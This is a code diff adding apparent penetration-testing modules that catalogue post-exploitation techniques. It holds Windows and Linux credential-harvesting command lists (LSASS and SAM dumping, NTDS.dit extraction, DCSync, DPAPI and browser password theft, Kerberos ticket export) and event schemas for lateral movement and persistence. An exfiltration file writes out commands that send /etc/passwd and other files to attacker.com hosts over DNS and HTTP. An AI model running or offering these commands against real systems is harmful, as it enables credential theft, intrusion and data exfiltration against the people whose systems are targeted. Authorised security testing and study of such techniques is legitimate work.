+      extractionCommands: getExtractionCommands(source),
+      tools: getTools(source),
+      risk: def.access === "admin" ? "medium" : "low",
+      detectionRisk: "low",
+      mitre: getMitre(source),
+      discovered: true,
+    }
+  }
+
+  /**
+   * Get extraction commands for a source.
+   */
+  function getExtractionCommands(source: PostExploitTypes.CredentialSource): string[] {
+    switch (source) {
+      case "shadow": return getShadowCommands().slice(0, 5)
+      case "ssh_keys": return getSSHKeyCommands().slice(0, 5)
+      case "history": return getHistoryCommands().slice(0, 5)
+      case "config_files": return getConfigFileCommands().slice(0, 5)
+      case "env_vars": return getEnvVarCommands().slice(0, 5)
+      default: return []
+    }
+  }
+
+  /**
+   * Get recommended tools for a source.
+   */
+  function getTools(source: PostExploitTypes.CredentialSource): string[] {
+    switch (source) {
+      case "shadow": return ["john", "hashcat", "unshadow"]
+      case "ssh_keys": return ["ssh-keygen", "ssh-add"]
+      case "history": return ["grep", "strings"]
+      case "config_files": return ["grep", "find", "strings"]
+      case "memory": return ["gdb", "strings", "mimipenguin"]
+      default: return []
+    }
+  }
+
+  /**
+   * Get MITRE techniques for a source.
+   */
+  function getMitre(source: PostExploitTypes.CredentialSource): string[] {
+    switch (source) {
+      case "shadow": return [PostExploitTypes.MITRE_CREDS.OS_CREDENTIAL_DUMPING]
+      case "ssh_keys": return [PostExploitTypes.MITRE_CREDS.SSH_KEYS]
+      case "history":
+      case "config_files":
+      case "env_vars":
+        return [PostExploitTypes.MITRE_CREDS.CREDENTIAL_FILES]
+      case "memory": return [PostExploitTypes.MITRE_CREDS.OS_CREDENTIAL_DUMPING]
+      default: return []
+    }
+  }
+
+  /**
+   * Format credential guidance for display.
+   */
+  export function formatGuidance(): string {
+    const lines: string[] = []
+    lines.push("LINUX CREDENTIAL HARVESTING GUIDANCE")
+    lines.push("====================================")
+    lines.push("")
+    lines.push("Priority Order (by impact):")
+    lines.push("1. /etc/shadow - Password hashes (requires root)")
+    lines.push("2. SSH keys - Direct access to other systems")
+    lines.push("3. Config files - Database and API credentials")
+    lines.push("4. History files - Cleartext passwords")
+    lines.push("5. Environment variables - Runtime secrets")
+    lines.push("")
+    lines.push("Quick Discovery:")
+    for (const cmd of getQuickDiscoveryCommands().slice(0, 10)) {
+      lines.push(`  ${cmd}`)
+    }
+    lines.push("")
+    lines.push("Tools:")
+    lines.push("  - LinPEAS - Comprehensive enumeration")
+    lines.push("  - mimipenguin - Memory credential extraction")
+    lines.push("  - LaZagne - Multi-source credential recovery")
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/creds/windows.ts b/packages/opencode/src/pentest/postexploit/creds/windows.ts
new file mode 100644
index 00000000000..63b0a1ec1f6
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/creds/windows.ts
@@ -0,0 +1,428 @@
+/**
+ * @fileoverview Windows Credential Harvesting Guidance
+ *
+ * Provides guidance for credential harvesting on Windows systems including
+ * SAM/SYSTEM, LSASS, NTDS.dit, DPAPI, browsers, and Kerberos tickets.
+ *
+ * @module pentest/postexploit/creds/windows
+ */
+
+import { PostExploitTypes } from "../types"
+
+/**
+ * Windows credential harvesting namespace.
+ */
+export namespace WindowsCreds {
+  /**
+   * Get SAM database extraction commands.
+   */
+  export function getSAMCommands(): string[] {
+    return [
+      "# SAM Database Extraction (Local Accounts)",
+      "# Requires SYSTEM privileges",
+      "",
+      "# Method 1: Registry save",
+      "reg save HKLM\\SAM sam.save",
+      "reg save HKLM\\SYSTEM system.save",
+      "reg save HKLM\\SECURITY security.save",
+      "",
+      "# Method 2: Volume Shadow Copy",
+      "wmic shadowcopy call create Volume='C:\\'",
+      "# Copy from shadow copy",
+      "copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SAM C:\\temp\\sam",
+      "copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM C:\\temp\\system",
+      "",
+      "# Extract hashes with secretsdump (offline)",
+      "secretsdump.py -sam sam.save -system system.save -security security.save LOCAL",
+      "",
+      "# Extract hashes with Mimikatz",
+      "lsadump::sam /sam:sam.save /system:system.save",
+      "",
+      "# Remote extraction with secretsdump",
+      "secretsdump.py <domain>/<user>:<pass>@<target>",
+    ]
+  }
+
+  /**
+   * Get LSASS memory dump commands.
+   */
+  export function getLSASSCommands(): string[] {
+    return [
+      "# LSASS Memory Extraction (Live Credentials)",
+      "# Requires SeDebugPrivilege (admin)",
+      "",
+      "# Method 1: Mimikatz (in-memory)",
+      "privilege::debug",
+      "sekurlsa::logonpasswords",
+      "",
+      "# Method 2: Procdump + Mimikatz",
+      "# Find LSASS PID",
+      "tasklist /fi \"imagename eq lsass.exe\"",
+      "",
+      "# Dump with procdump",
+      "procdump.exe -accepteula -ma lsass.exe C:\\temp\\lsass.dmp",
+      "",
+      "# Analyze with Mimikatz",
+      "sekurlsa::minidump C:\\temp\\lsass.dmp",
+      "sekurlsa::logonpasswords",
+      "",
+      "# Method 3: comsvcs.dll (no external tools)",
+      "# Find LSASS PID first",
+      'for /f "tokens=2 delims= " %a in (\'tasklist /fi "imagename eq lsass.exe" /nh\') do set pid=%a',
+      'rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump %pid% C:\\temp\\lsass.dmp full',
+      "",
+      "# Method 4: Task Manager (GUI)",
+      "# Right-click lsass.exe > Create dump file",
+      "",
+      "# Method 5: nanodump (evasive)",
+      "# https://github.com/helpsystems/nanodump",
+      "",
+      "# Analysis of dump on different machine",
+      "# pypykatz lsa minidump lsass.dmp",
+    ]
+  }
+
+  /**
+   * Get NTDS.dit extraction commands (Domain Controller).
+   */
+  export function getNTDSCommands(): string[] {
+    return [
+      "# NTDS.dit Extraction (All Domain Hashes)",
+      "# Requires Domain Admin or backup rights",
+      "",
+      "# Method 1: ntdsutil",
+      "ntdsutil \"ac i ntds\" \"ifm\" \"create full C:\\temp\\ntds\" q q",
+      "",
+      "# Extract hashes offline",
+      "secretsdump.py -ntds C:\\temp\\ntds\\Active\\ Directory\\ntds.dit -system C:\\temp\\ntds\\registry\\SYSTEM LOCAL",
+      "",
+      "# Method 2: Volume Shadow Copy",
+      'vssadmin create shadow /for=C:',
+      "copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\ntds.dit C:\\temp\\ntds.dit",
+      "copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM C:\\temp\\system",
+      "",
+      "# Method 3: DCSync (no file access needed)",
+      "# Mimikatz",
+      "lsadump::dcsync /domain:<domain> /all /csv",
+      "lsadump::dcsync /domain:<domain> /user:krbtgt",
+      "",
+      "# secretsdump.py",
+      "secretsdump.py <domain>/<user>:<pass>@<dc> -just-dc",
+      "secretsdump.py -k -no-pass <domain>/<user>@<dc> -just-dc  # With Kerberos",
+      "",
+      "# Method 4: DiskShadow (stealthier)",
+      "# Create script file:",
+      "# set context persistent nowriters",
+      '# add volume c: alias evil',
+      '# create',
+      '# expose %evil% z:',
+      "diskshadow /s script.txt",
+    ]
+  }
+
+  /**
+   * Get DPAPI extraction commands.
+   */
+  export function getDPAPICommands(): string[] {
+    return [
+      "# DPAPI Protected Secrets",
+      "# User and System protected credentials",
+      "",
+      "# Find DPAPI blobs",
+      "dir /s /b %APPDATA%\\Microsoft\\Credentials\\",
+      "dir /s /b %LOCALAPPDATA%\\Microsoft\\Credentials\\",
+      "",
+      "# Mimikatz DPAPI",
+      "dpapi::cred /in:%APPDATA%\\Microsoft\\Credentials\\<blob>",
+      "",
+      "# Get master keys",
+      "dpapi::masterkey /in:%APPDATA%\\Microsoft\\Protect\\<SID>\\<GUID>",
+      "",
+      "# With domain backup key (if you have DA)",
+      "lsadump::backupkeys /system:<dc> /export",
+      "",
+      "# SharpDPAPI",
+      "SharpDPAPI.exe credentials",
+      "SharpDPAPI.exe backupkey /target:<dc>",
+      "SharpDPAPI.exe machinevaults",
+      "SharpDPAPI.exe machinecredentials",
+      "",
+      "# Decrypt with domain backup key",
+      "SharpDPAPI.exe credentials /pvk:<backup_key.pvk>",
+    ]
+  }
+
+  /**
+   * Get Credential Manager extraction commands.
+   */
+  export function getCredentialManagerCommands(): string[] {
+    return [
+      "# Windows Credential Manager",
+      "# Stores web and Windows credentials",
+      "",
+      "# List stored credentials",
+      "cmdkey /list",
+      "",
+      "# Mimikatz",
+      "vault::cred",
+      "vault::list",
+      "",
+      "# VaultCmd (native)",
+      "vaultcmd /listcreds:\"Windows Credentials\"",
+      "vaultcmd /listcreds:\"Web Credentials\"",
+      "",
+      "# PowerShell",
+      "[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]",
+      "$vault = New-Object Windows.Security.Credentials.PasswordVault",
+      "$vault.RetrieveAll()",
+    ]
+  }
+
+  /**
+   * Get browser credential extraction commands.
+   */
+  export function getBrowserCommands(): string[] {
+    return [
+      "# Browser Credential Extraction",
+      "",
+      "# Chrome",
+      "# Login Data is an SQLite database encrypted with DPAPI",
+      "# Location: %LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Login Data",
+      "",
+      "# SharpChrome",
+      "SharpChrome.exe logins",
+      "SharpChrome.exe cookies",
+      "",
+      "# Firefox",
+      "# Credentials in logins.json, encrypted with key4.db",
+      "# Location: %APPDATA%\\Mozilla\\Firefox\\Profiles\\<profile>\\",
+      "",
+      "# firefox_decrypt",
+      "python firefox_decrypt.py",
+      "",
+      "# Edge (Chromium)",
+      "# Same as Chrome",
+      "# Location: %LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Login Data",
+      "",
+      "# LaZagne (all browsers)",
+      "lazagne.exe browsers",
+      "",
+      "# HackBrowserData",
+      "# https://github.com/moonD4rk/HackBrowserData",
+      "hack-browser-data.exe",
+    ]
+  }
+
+  /**
+   * Get Kerberos ticket extraction commands.
+   */
+  export function getKerberosCommands(): string[] {
+    return [
+      "# Kerberos Ticket Extraction",
+      "",
+      "# List current tickets",
+      "klist",
+      "",
+      "# Mimikatz - export all tickets",
+      "sekurlsa::tickets /export",
+      "",
+      "# Mimikatz - specific TGT",
+      "kerberos::list /export",
+      "",
+      "# Rubeus",
+      "Rubeus.exe triage",
+      "Rubeus.exe dump",
+      "Rubeus.exe dump /luid:<logon_id>",
+      "Rubeus.exe dump /user:<username>",
+      "",
+      "# Request new TGT (with hash)",
+      "Rubeus.exe asktgt /user:<user> /rc4:<ntlm>",
+      "Rubeus.exe asktgt /user:<user> /aes256:<aes256>",
+      "",
+      "# Convert ticket format",
+      "ticketConverter.py ticket.kirbi ticket.ccache",
+      "",
+      "# Use ticket with Impacket",
+      "export KRB5CCNAME=ticket.ccache",
+      "psexec.py -k -no-pass <domain>/<user>@<target>",
+    ]
+  }
+
+  /**
+   * Get WiFi password extraction commands.
+   */
+  export function getWiFiCommands(): string[] {
+    return [
+      "# WiFi Password Extraction",
+      "",
+      "# List saved networks",
+      "netsh wlan show profiles",
+      "",
+      "# Show password for specific network",
+      'netsh wlan show profile name="<SSID>" key=clear',
+      "",
+      "# Export all WiFi passwords",
+      'for /f "tokens=2 delims=:" %a in (\'netsh wlan show profiles ^| findstr Profile\') do @netsh wlan show profile %a key=clear | findstr "SSID Key"',
+      "",
+      "# PowerShell one-liner",
+      '(netsh wlan show profiles) | Select-String "\\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\\W+\\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ SSID=$name;Password=$pass }}',
+    ]
+  }
+
+  /**
+   * Get quick discovery commands.
+   */
+  export function getQuickDiscoveryCommands(): string[] {
+    return [
+      "# Quick Windows Credential Discovery",
+      "",
+      "echo === Current User ===",
+      "whoami /all",
+      "",
+      "echo === Stored Credentials ===",
+      "cmdkey /list",
+      "",
+      "echo === Recent RDP Connections ===",
+      'reg query "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers"',
+      "",
+      "echo === AutoLogon ===",
+      'reg query "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" 2>nul | findstr /i "DefaultUserName DefaultPassword"',
+      "",
+      "echo === WiFi Profiles ===",
+      "netsh wlan show profiles",
+      "",
+      "echo === Credential Files ===",
+      'dir /s /b %APPDATA%\\Microsoft\\Credentials\\* 2>nul',
+      "",
+      "echo === Interesting Registry ===",
+      "reg query HKLM /f password /t REG_SZ /s 2>nul | head -20",
+      "reg query HKCU /f password /t REG_SZ /s 2>nul | head -20",
+    ]
+  }
+
+  /**
+   * Create a credential location for a specific discovery.
+   */
+  export function createCredentialLocation(
+    source: PostExploitTypes.CredentialSource,
+    path: string,
+    options?: {
+      description?: string
+      expectedTypes?: PostExploitTypes.CredentialType[]
+      accessLevel?: "user" | "admin" | "system"
+    }
+  ): Omit<PostExploitTypes.CredentialLocation, "id" | "discoveredAt"> {
+    const defaults: Record<string, {
+      description: string
+      types: PostExploitTypes.CredentialType[]
+      access: "user" | "admin" | "system"
+      detection: PostExploitTypes.DetectionRisk
+    }> = {
+      sam: { description: "SAM database hashes", types: ["hash_ntlm", "hash_lm"], access: "system", detection: "medium" },
+      lsass: { description: "LSASS memory credentials", types: ["password", "hash_ntlm", "kerberos_ticket"], access: "admin", detection: "high" },
+      ntds: { description: "NTDS.dit domain hashes", types: ["hash_ntlm"], access: "admin", detection: "high" },
+      dpapi: { description: "DPAPI protected secrets", types: ["password"], access: "user", detection: "medium" },
+      credential_manager: { description: "Credential Manager", types: ["password"], access: "user", detection: "low" },
+      browser: { description: "Browser saved passwords", types: ["browser_password"], access: "user", detection: "low" },
+      kerberos: { description: "Kerberos tickets", types: ["kerberos_ticket"], access: "admin", detection: "medium" },
+      wifi: { description: "WiFi passwords", types: ["wifi_password"], access: "admin", detection: "low" },
+    }
+
+    const def = defaults[source] || { description: "Credential location", types: ["password"], access: "user" as const, detection: "low" as const }
+
+    return {
+      source,
+      platform: "windows",
+      path,
+      description: options?.description || def.description,
+      expectedTypes: options?.expectedTypes || def.types,
+      accessLevel: options?.accessLevel || def.access,
+      extractionCommands: getExtractionCommands(source),
+      tools: getTools(source),
+      risk: def.access === "system" ? "high" : def.access === "admin" ? "medium" : "low",
+      detectionRisk: def.detection,
+      mitre: getMitre(source),
+      discovered: true,
+    }
+  }
+
+  /**
+   * Get extraction commands for a source.
+   */
+  function getExtractionCommands(source: PostExploitTypes.CredentialSource): string[] {
+    switch (source) {
+      case "sam": return getSAMCommands().slice(0, 8)
+      case "lsass": return getLSASSCommands().slice(0, 8)
+      case "ntds": return getNTDSCommands().slice(0, 8)
+      case "dpapi": return getDPAPICommands().slice(0, 8)
+      case "credential_manager": return getCredentialManagerCommands().slice(0, 5)
+      case "browser": return getBrowserCommands().slice(0, 8)
+      case "kerberos": return getKerberosCommands().slice(0, 8)
+      case "wifi": return getWiFiCommands().slice(0, 5)
+      default: return []
+    }
+  }
+
+  /**
+   * Get recommended tools for a source.
+   */
+  function getTools(source: PostExploitTypes.CredentialSource): string[] {
+    switch (source) {
+      case "sam": return ["mimikatz", "secretsdump.py", "reg"]
+      case "lsass": return ["mimikatz", "procdump", "pypykatz", "nanodump"]
+      case "ntds": return ["secretsdump.py", "mimikatz", "ntdsutil", "diskshadow"]
+      case "dpapi": return ["mimikatz", "SharpDPAPI"]
+      case "credential_manager": return ["mimikatz", "cmdkey", "vaultcmd"]
+      case "browser": return ["SharpChrome", "lazagne", "HackBrowserData"]
+      case "kerberos": return ["mimikatz", "Rubeus", "ticketConverter.py"]
+      case "wifi": return ["netsh"]
+      default: return []
+    }
+  }
+
+  /**
+   * Get MITRE techniques for a source.
+   */
+  function getMitre(source: PostExploitTypes.CredentialSource): string[] {
+    switch (source) {
+      case "sam": return [PostExploitTypes.MITRE_CREDS.SAM]
+      case "lsass": return [PostExploitTypes.MITRE_CREDS.LSASS_MEMORY]
+      case "ntds": return [PostExploitTypes.MITRE_CREDS.NTDS]
+      case "dpapi": return [PostExploitTypes.MITRE_CREDS.DPAPI]
+      case "browser": return [PostExploitTypes.MITRE_CREDS.BROWSER_CREDS]
+      case "kerberos": return [PostExploitTypes.MITRE_CREDS.KERBEROASTING]
+      default: return [PostExploitTypes.MITRE_CREDS.CREDENTIAL_FILES]
+    }
+  }
+
+  /**
+   * Format credential guidance for display.
+   */
+  export function formatGuidance(): string {
+    const lines: string[] = []
+    lines.push("WINDOWS CREDENTIAL HARVESTING GUIDANCE")
+    lines.push("======================================")
+    lines.push("")
+    lines.push("Priority Order (by impact):")
+    lines.push("1. LSASS - Live credentials, tickets (admin required)")
+    lines.push("2. SAM - Local account hashes (SYSTEM required)")
+    lines.push("3. NTDS.dit - All domain hashes (DC, DA required)")
+    lines.push("4. DPAPI - Protected secrets (user context)")
+    lines.push("5. Browsers - Saved web passwords")
+    lines.push("6. Credential Manager - Windows stored creds")
+    lines.push("")
+    lines.push("Quick Wins:")
+    lines.push("  cmdkey /list")
+    lines.push("  reg query HKLM\\...\\Winlogon (AutoLogon)")
+    lines.push("  netsh wlan show profiles (WiFi)")
+    lines.push("")
+    lines.push("Key Tools:")
+    lines.push("  - Mimikatz - Swiss army knife for Windows creds")
+    lines.push("  - Rubeus - Kerberos operations")
+    lines.push("  - secretsdump.py - Remote/offline hash extraction")
+    lines.push("  - SharpDPAPI - DPAPI operations")
+    lines.push("  - LaZagne - Multi-source credential recovery")
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/events.ts b/packages/opencode/src/pentest/postexploit/events.ts
new file mode 100644
index 00000000000..9876ce5744c
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/events.ts
@@ -0,0 +1,423 @@
+/**
+ * @fileoverview Post-Exploitation Events
+ *
+ * Bus event definitions for post-exploitation operations including
+ * privilege escalation, lateral movement, credentials, persistence,
+ * exfiltration, and cleanup.
+ *
+ * @module pentest/postexploit/events
+ */
+
+import z from "zod"
+import { BusEvent } from "../../bus/bus-event"
+
+/**
+ * Post-exploitation events namespace.
+ */
+export namespace PostExploitEvents {
+  // ============================================
+  // Session Events
+  // ============================================
+
+  /**
+   * Post-exploitation session started.
+   */
+  export const SessionStarted = BusEvent.define(
+    "pentest.postexploit.session_started",
+    z.object({
+      sessionID: z.string(),
+      target: z.string(),
+      platform: z.enum(["linux", "windows"]),
+      profile: z.string(),
+      currentUser: z.string(),
+      currentPrivilege: z.string(),
+    })
+  )
+
+  /**
+   * Post-exploitation session completed.
+   */
+  export const SessionCompleted = BusEvent.define(
+    "pentest.postexploit.session_completed",
+    z.object({
+      sessionID: z.string(),
+      target: z.string(),
+      platform: z.string(),
+      profile: z.string(),
+      duration: z.number(),
+      stats: z.object({
+        privescVectors: z.number(),
+        lateralTargets: z.number(),
+        credentials: z.number(),
+        persistenceOptions: z.number(),
+        dataTargets: z.number(),
+        artifacts: z.number(),
+      }),
+      status: z.enum(["completed", "stopped", "partial"]),
+    })
+  )
+
+  /**
+   * Session failed.
+   */
+  export const SessionFailed = BusEvent.define(
+    "pentest.postexploit.session_failed",
+    z.object({
+      sessionID: z.string(),
+      target: z.string(),
+      error: z.string(),
+      module: z.string().optional(),
+    })
+  )
+
+  // ============================================
+  // Privilege Escalation Events
+  // ============================================
+
+  /**
+   * Privilege escalation vector found.
+   */
+  export const PrivescVectorFound = BusEvent.define(
+    "pentest.postexploit.privesc_vector_found",
+    z.object({
+      sessionID: z.string(),
+      host: z.string(),
+      category: z.string(),
+      name: z.string(),
+      risk: z.enum(["critical", "high", "medium", "low", "info"]),
+      exploitability: z.enum(["trivial", "easy", "moderate", "difficult"]),
+      target: z.string(),
+      detectionRisk: z.enum(["low", "medium", "high"]),
+      mitre: z.array(z.string()),
+    })
+  )
+
+  /**
+   * SUID binary discovered.
+   */
+  export const SUIDBinaryFound = BusEvent.define(
+    "pentest.postexploit.suid_binary_found",
+    z.object({
+      sessionID: z.string(),
+      host: z.string(),
+      path: z.string(),
+      owner: z.string(),
+      permissions: z.string(),
+      gtfobins: z.string().optional(),
+      exploitable: z.boolean(),
+    })
+  )
+
+  /**
+   * Sudo misconfiguration found.
+   */
+  export const SudoMisconfigFound = BusEvent.define(
+    "pentest.postexploit.sudo_misconfig_found",
+    z.object({
+      sessionID: z.string(),
+      host: z.string(),
+      rule: z.string(),
+      user: z.string(),
+      commands: z.array(z.string()),
+      nopasswd: z.boolean(),
+      exploitable: z.boolean(),
+    })
+  )
+
+  /**
+   * Windows service vulnerability found.
+   */
+  export const ServiceVulnFound = BusEvent.define(
+    "pentest.postexploit.service_vuln_found",
+    z.object({
+      sessionID: z.string(),
+      host: z.string(),
+      serviceName: z.string(),
+      vulnerability: z.string(),
+      unquotedPath: z.boolean().optional(),
+      writablePath: z.boolean().optional(),
+      weakPermissions: z.boolean().optional(),
+    })
+  )
+
+  // ============================================
+  // Lateral Movement Events
+  // ============================================
+
+  /**
+   * Lateral movement target discovered.
+   */
+  export const LateralTargetDiscovered = BusEvent.define(
+    "pentest.postexploit.lateral_target_discovered",
+    z.object({
+      sessionID: z.string(),
+      source: z.string(),
+      destination: z.string(),
+      hostname: z.string().optional(),
+      availableMethods: z.array(z.string()),
+      openPorts: z.array(z.number()),
+    })
+  )
+
+  /**
+   * Lateral movement path identified.
+   */
+  export const LateralPathIdentified = BusEvent.define(
+    "pentest.postexploit.lateral_path_identified",
+    z.object({
+      sessionID: z.string(),
+      source: z.string(),
+      destination: z.string(),
+      method: z.string(),
+      credentialType: z.string().optional(),
+      risk: z.enum(["critical", "high", "medium", "low", "info"]),
+      detectionRisk: z.enum(["low", "medium", "high"]),
+    })
+  )
+
+  /**
+   * SMB share accessible for lateral movement.
+   */
+  export const SMBShareAccessible = BusEvent.define(
+    "pentest.postexploit.smb_share_accessible",
+    z.object({
+      sessionID: z.string(),
+      host: z.string(),
+      shareName: z.string(),
+      writable: z.boolean(),
+      adminShare: z.boolean(),
+    })
+  )
+
+  // ============================================
+  // Credential Events
+  // ============================================
+
+  /**
+   * Credential location discovered.
+   */
+  export const CredentialLocationDiscovered = BusEvent.define(
+    "pentest.postexploit.credential_location_discovered",
+    z.object({
+      sessionID: z.string(),
+      host: z.string(),
+      source: z.string(),
+      path: z.string(),
+      expectedTypes: z.array(z.string()),
+      accessLevel: z.string(),
+      detectionRisk: z.enum(["low", "medium", "high"]),
+    })
+  )
+
+  /**
+   * Credential harvested.
+   */
+  export const CredentialHarvested = BusEvent.define(
+    "pentest.postexploit.credential_harvested",
+    z.object({
+      sessionID: z.string(),
+      host: z.string(),
+      type: z.string(),
+      source: z.string(),
+      username: z.string().optional(),
+      domain: z.string().optional(),
+      valid: z.boolean().optional(),
+    })
+  )
+
+  /**
+   * SSH key discovered.
+   */
+  export const SSHKeyDiscovered = BusEvent.define(
+    "pentest.postexploit.ssh_key_discovered",
+    z.object({
+      sessionID: z.string(),
+      host: z.string(),
+      keyPath: z.string(),
+      keyType: z.string(),
+      hasPassphrase: z.boolean().optional(),
+      authorizedHosts: z.array(z.string()).optional(),
+    })
+  )
+
+  /**
+   * Browser credentials found.
+   */
+  export const BrowserCredsFound = BusEvent.define(
+    "pentest.postexploit.browser_creds_found",
+    z.object({
+      sessionID: z.string(),
+      host: z.string(),
+      browser: z.string(),
+      credentialCount: z.number(),
+      domains: z.array(z.string()),
+    })
+  )
+
+  // ============================================
+  // Persistence Events
+  // ============================================
+
+  /**
+   * Persistence opportunity found.
+   */
+  export const PersistenceOpportunity = BusEvent.define(
+    "pentest.postexploit.persistence_opportunity",
+    z.object({
+      sessionID: z.string(),
+      host: z.string(),
+      category: z.string(),
+      name: z.string(),
+      location: z.string(),
+      privilege: z.string(),
+      survival: z.enum(["reboot", "logout", "service_restart"]),
+      detectionRisk: z.enum(["low", "medium", "high"]),
+    })
+  )
+
+  /**
+   * Persistence mechanism cataloged.
+   */
+  export const PersistenceCataloged = BusEvent.define(
+    "pentest.postexploit.persistence_cataloged",
+    z.object({
+      sessionID: z.string(),
+      host: z.string(),
+      platform: z.enum(["linux", "windows"]),
+      mechanismCount: z.number(),
+      categories: z.array(z.string()),
+    })
+  )
+
+  // ============================================
+  // Data Exfiltration Events
+  // ============================================
+
+  /**
+   * Sensitive data target found.
+   */
+  export const DataTargetFound = BusEvent.define(
+    "pentest.postexploit.data_target_found",
+    z.object({
+      sessionID: z.string(),
+      host: z.string(),
+      type: z.string(),
+      path: z.string(),
+      sensitivity: z.enum(["public", "internal", "confidential", "secret", "top_secret"]),
+      accessible: z.boolean(),
+    })
+  )
+
+  /**
+   * Exfiltration channel analyzed.
+   */
+  export const ExfilChannelAnalyzed = BusEvent.define(
+    "pentest.postexploit.exfil_channel_analyzed",
+    z.object({
+      sessionID: z.string(),
+      host: z.string(),
+      channelType: z.string(),
+      available: z.boolean(),
+      bandwidth: z.enum(["low", "medium", "high"]),
+      detectionRisk: z.enum(["low", "medium", "high"]),
+    })
+  )
+
+  // ============================================
+  // Cleanup Events
+  // ============================================
+
+  /**
+   * Artifact created (for tracking).
+   */
+  export const ArtifactCreated = BusEvent.define(
+    "pentest.postexploit.artifact_created",
+    z.object({
+      sessionID: z.string(),
+      host: z.string(),
+      type: z.string(),
+      path: z.string(),
+      createdBy: z.string(),
+    })
+  )
+
+  /**
+   * Artifact cleaned.
+   */
+  export const ArtifactCleaned = BusEvent.define(
+    "pentest.postexploit.artifact_cleaned",
+    z.object({
+      sessionID: z.string(),
+      host: z.string(),
+      type: z.string(),
+      path: z.string(),
+      verified: z.boolean(),
+    })
+  )
+
+  /**
+   * Cleanup checklist generated.
+   */
+  export const CleanupChecklistGenerated = BusEvent.define(
+    "pentest.postexploit.cleanup_checklist_generated",
+    z.object({
+      sessionID: z.string(),
+      host: z.string(),
+      artifactCount: z.number(),
+      checklistItems: z.number(),
+      criticalItems: z.number(),
+    })
+  )
+
+  // ============================================
+  // Parser Events
+  // ============================================
+
+  /**
+   * LinPEAS output parsed.
+   */
+  export const LinPEASParsed = BusEvent.define(
+    "pentest.postexploit.linpeas_parsed",
+    z.object({
+      sessionID: z.string().optional(),
+      host: z.string(),
+      sectionsFound: z.number(),
+      findingsCount: z.number(),
+      privescVectors: z.number(),
+      criticalFindings: z.number(),
+    })
+  )
+
+  /**
+   * WinPEAS output parsed.
+   */
+  export const WinPEASParsed = BusEvent.define(
+    "pentest.postexploit.winpeas_parsed",
+    z.object({
+      sessionID: z.string().optional(),
+      host: z.string(),
+      sectionsFound: z.number(),
+      findingsCount: z.number(),
+      privescVectors: z.number(),
+      criticalFindings: z.number(),
+    })
+  )
+
+  // ============================================
+  // Progress Events
+  // ============================================
+
+  /**
+   * Module progress update.
+   */
+  export const ModuleProgress = BusEvent.define(
+    "pentest.postexploit.module_progress",
+    z.object({
+      sessionID: z.string(),
+      module: z.string(),
+      action: z.string(),
+      progress: z.number(), // 0-100
+      message: z.string().optional(),
+    })
+  )
+}
diff --git a/packages/opencode/src/pentest/postexploit/exfil/channels.ts b/packages/opencode/src/pentest/postexploit/exfil/channels.ts
new file mode 100644
index 00000000000..f19894ecffd
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/exfil/channels.ts
@@ -0,0 +1,434 @@
+/**
+ * @fileoverview Exfiltration Channels
+ *
+ * Provides guidance for various data exfiltration channels including
+ * DNS, HTTP, SSH, cloud storage, and covert channels.
+ *
+ * @module pentest/postexploit/exfil/channels
+ */
+
+import { PostExploitTypes } from "../types"
+
+/**
+ * Exfiltration channels namespace.
+ */
+export namespace ExfilChannels {
+  /**
+   * Exfiltration channel details.
+   */
+  export const CHANNELS: Record<PostExploitTypes.ExfilChannelType, {
+    name: string
+    description: string
+    bandwidth: "low" | "medium" | "high"
+    detectionRisk: PostExploitTypes.DetectionRisk
+    prerequisites: string[]
+    tools: string[]
+    commands: string[]
+    mitre: string[]
+  }> = {
+    dns: {
+      name: "DNS Tunneling",
+      description: "Exfiltrate data via DNS queries to attacker-controlled domain",
+      bandwidth: "low",
+      detectionRisk: "low",
+      prerequisites: [
+        "Attacker-controlled domain",
+        "DNS server configured to receive data",
+        "Outbound DNS (UDP 53) allowed",
+      ],
+      tools: ["dnscat2", "iodine", "dns2tcp", "dnsexfiltrator"],
+      commands: [
+        "# Using dnscat2 server",
+        "dnscat2 --dns domain=exfil.attacker.com --secret=password",
+        "",
+        "# Using dnscat2 client",
+        "./dnscat --dns server=exfil.attacker.com --secret=password",
+        "",
+        "# Simple base64 encoding via nslookup",
+        "nslookup $(cat /etc/passwd | base64 | tr -d '\\n' | cut -c1-63).exfil.attacker.com",
+        "",
+        "# PowerShell DNS exfil",
+        "$data = [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\\secret.txt'))",
+        "nslookup \"$data.exfil.attacker.com\"",
+      ],
+      mitre: [PostExploitTypes.MITRE_EXFIL.DNS],
+    },
+    http: {
+      name: "HTTP/HTTPS",
+      description: "Exfiltrate data via HTTP POST requests",
+      bandwidth: "high",
+      detectionRisk: "medium",
+      prerequisites: [
+        "Outbound HTTP/HTTPS allowed",
+        "Attacker server to receive data",
+      ],
+      tools: ["curl", "wget", "PowerShell", "python"],
+      commands: [
+        "# Linux - curl POST",
+        "curl -X POST -d @/path/to/data.txt https://attacker.com/exfil",
+        "",
+        "# Linux - base64 encode first",
+        "cat /path/to/data | base64 | curl -X POST -d @- https://attacker.com/exfil",
+        "",
+        "# Windows - PowerShell",
+        "$data = Get-Content C:\\path\\to\\data.txt -Raw",
+        "Invoke-WebRequest -Uri https://attacker.com/exfil -Method POST -Body $data",
+        "",
+        "# Windows - certutil + HTTPS",
